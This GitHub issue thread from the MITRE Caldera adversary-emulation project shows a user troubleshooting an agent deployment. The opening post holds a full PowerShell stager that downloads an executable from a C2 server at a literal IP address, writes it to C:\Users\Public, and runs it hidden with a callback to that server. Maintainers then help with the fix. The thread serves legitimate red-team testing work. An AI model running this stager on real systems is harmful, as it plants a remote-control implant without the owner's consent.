### ISSUE TITLE
Error executing S4ncd47 on my Windows Server 2019 VM 

### ISSUE THREAD

**Issue by DillonSingh** [mitre/caldera#2645]
![image](https://user-images.githubusercontent.com/100767876/185945077-d2f48ab9-cc96-4401-833c-22646fe8bbde.png)

PS C:\Windows\system32> if ($host.Version.Major -ge 3){$ErrAction= "ignore"}else{$ErrAction= "SilentlyContinue"};$server="52.212.164.168:8888";$socket="52.212.164.168:7010";$contact="tcp";$url="$server/file/download";$wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows");$wc.Headers.add("file","manx.go");$data=$wc.DownloadData($url);$name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","");Get-Process | ? {$_.Path -like "C:\Users\Public\$name.exe"} | stop-process -f -ea $ErrAction;rm -force "C:\Users\Public\$name.exe" -ea $ErrAction;([io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data)) | Out-Null;Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-socket $socket -http $server -contact $contact" -WindowStyle hidden;

Exception calling "DownloadData" with "1" argument(s): "The given path's format is not supported."
At line:1 char:302
+ ... wc.Headers.add("file","manx.go");$data=$wc.DownloadData($url);$name=$ ...
+                                      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : NotSupportedException

Cannot index into a null array.
At line:1 char:331
+ ... dData($url);$name=$wc.ResponseHeaders["Content-Disposition"].Substrin ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : NullArray

Exception calling "WriteAllBytes" with "2" argument(s): "Value cannot be null.
Parameter name: bytes"
At line:1 char:620
+ ...  $ErrAction;([io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$da ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ArgumentNullException

Start-Process : This command cannot be run due to the error: The system cannot find the file specified.
At line:1 char:693
+ ...  | Out-Null;Start-Process -FilePath C:\Users\Public\$name.exe -Argume ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Start-Process], InvalidOperationException
    + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand

I have been trying to troubleshoot this for hours but haven't gotten anywhere - I'd appreciate anyones help

**Comment by AndyCyberSec** [comment]
Probably you miss http:// in your $server variable

**Comment by DillonSingh** [comment]
Thanks for the reply - it's all sorted now :)

**Comment by clenk** [comment]
Hi @DillonSingh, can you check the Caldera server and see what error(s) it printed on the command line?

**Comment by DillonSingh** [comment]
Hi @clenk How do I do that? Apologies if this seems like a silly question!

**Comment by clenk** [comment]
@DillonSingh no worries. You probably started the Caldera server with a command similar to `python3 server.py --insecure`. Check the window in which you ran that command and see if it showed any errors there when the GUI showed "Internal Server Error".

**Comment by DillonSingh** [comment]
Will do

**Comment by DillonSingh** [comment]
I tried and checked no errors appear
Caldera C2 GUI:
[image: image.png]


No errors appearing on the CLI
[image: image.png]

**Comment by DillonSingh** [comment]
Hi Chris, I've solved it :) everything is okay. Thanks so much for your
help :)

**Comment by clenk** [comment]
Thanks for letting us know!
